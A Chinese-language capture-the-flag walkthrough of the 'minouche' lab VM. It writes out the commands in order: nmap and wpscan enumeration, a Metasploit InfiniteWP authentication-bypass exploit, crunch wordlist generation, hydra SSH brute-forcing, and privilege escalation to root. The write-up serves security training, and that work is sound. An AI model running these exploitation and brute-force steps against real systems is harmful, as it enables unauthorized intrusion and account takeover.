minouche

靶机准备

先将靶机导入虚拟机，并将网络模式改为NAT



扫描不到ip，改VirtualBox，使用桥接，并将kali也改为桥接模式



扫描ip：192.168.0.102

netdiscover -r 192.168.0.0/24192.168.0.0/24

kali：192.168.0.105

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.0.102

开放了3个端口

查看80端口



发现是wordpress的CMS框架

再用dirb扫描，确认一下



用wpscan扫描，枚举用户

wpscan --url http://192.168.0.102 -e u,p

扫描到一个用户：kitty



尝试爆破密码

wpscan --url http://192.168.0.102 -U kitty -P /usr/share/wordlists/rockyou.txt

半天爆不出来，尝试从插件入手，用此工具扫描其插件

wpscan --url http://192.168.0.102 -e u,p --plugins-detection mixed

扫描到插件iwp-client



发现有漏洞：



使用msf搜索此漏洞进行利用

search InfiniteWP
use exploit/unix/webapp/wp_infinitewp_auth_bypass
set lhost 192.168.0.105
set rhosts 192.168.0.102
set username kitty
exploit

成功拿到shell

挖掘信息

一直退到根目录下发现有一个kitty.txt文件，cat查看



有个提示，你的密码使用美元符+猫的名字+你出生的年份不是一个好密码

用kali下自带的crunch根据提示生成字典

命令:

crunch 13 13 -t "$"Minouche19%% -o 1.txt
crunch 13 13 -t "$"Minouche20%% -o 2.txt

用hydra爆破一波

hydra -l kitty -P 2.txt ssh://192.168.0.102

爆破出密码



利用得到的密码，登录



在目录下发现user.txt，cat查看



发现还有一个压缩包：android.zip

拷贝下来解压

scp kitty@192.168.0.102:~/android.zip /root

解压完以后多了一个data里面有很多数据



搜索数据库发现一个数据库里面有东西

find . -name *.db

打开数据库工具在里面发现有一长串数据



尝试用这串数据提权



提权成功

获取root目录下的数据